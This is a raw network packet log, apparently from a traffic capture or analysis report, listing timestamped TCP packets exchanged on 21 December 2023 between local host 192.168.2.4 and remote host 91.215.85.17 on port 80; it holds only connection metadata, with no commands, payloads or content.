                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223119020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223129988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223143101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223162889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223186016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223227024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223233938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223247051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223278046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223289013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223321915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223344088 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223364115 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223381042 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223426104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223438978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223476887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223503113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223537922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223577976 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223618031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223632097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223649979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223659039 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223678112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223685026 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223695993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223737001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223740101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223757029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223771095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223798990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223807096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223846912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223864079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223880053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223887920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223897934 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223898888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223925114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223934889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224025965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224072933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224107981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224112988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224121094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224159956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224184036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224200010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224217892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224224091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224231958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224246025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224251032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224261045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224276066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224287033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224309921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224328995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224340916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224366903 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224390030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224391937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224391937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224404097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224443913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224443913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224493980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224533081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224562883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224602938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224610090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224642992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224684000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224714994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224735022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224776030 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224790096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224802017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224831104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224853039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224885941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224894047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224916935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224931002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224957943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224966049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224978924 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.224987030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225004911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225006104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225033998 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225073099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225106955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225115061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225164890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225207090 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225223064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225236893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225270033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225279093 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225311041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225322008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225342989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225374937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225383043 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225404978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225445032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225456953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225471020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225497007 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225516081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225527048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225545883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225568056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225583076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225591898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225608110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225622892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225634098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225644112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225657940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225677967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225708961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225720882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225740910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225742102 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225785971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225814104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225826025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225846052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225857019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225893021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225904942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225922108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225931883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225951910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225960016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225969076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.225975990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226016998 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226021051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226037979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226087093 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226090908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226125002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226145983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226147890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226171970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226182938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226197958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226212025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226244926 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226247072 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226258993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226295948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226320028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226332903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226358891 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226378918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226380110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226392984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226413965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226424932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226463079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226480961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226516962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226561069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226594925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226608038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226624966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226634979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226645947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226670027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226679087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226696968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226735115 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226746082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226767063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226780891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226807117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226814985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226824999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226845980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226851940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226880074 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226896048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226941109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226954937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226982117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.226994991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227003098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227015972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227052927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227060080 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227078915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227092028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227118015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227132082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227138042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227155924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227168083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227179050 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227193117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227205038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227214098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227267027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227360964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227509022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227538109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227546930 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227551937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227570057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227591991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227752924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227835894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.227906942 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228025913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228138924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228178024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228207111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228322983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228367090 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228571892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228601933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228615046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228668928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228682995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228713989 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228849888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228884935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.228951931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229053020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229218960 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229238987 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229270935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229388952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229446888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229507923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229640007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229652882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229676962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229679108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229695082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229713917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229954958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.229996920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230019093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230056047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230153084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230190039 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230314016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230328083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.230389118 CET4973880192.168.2.491.215.85.17
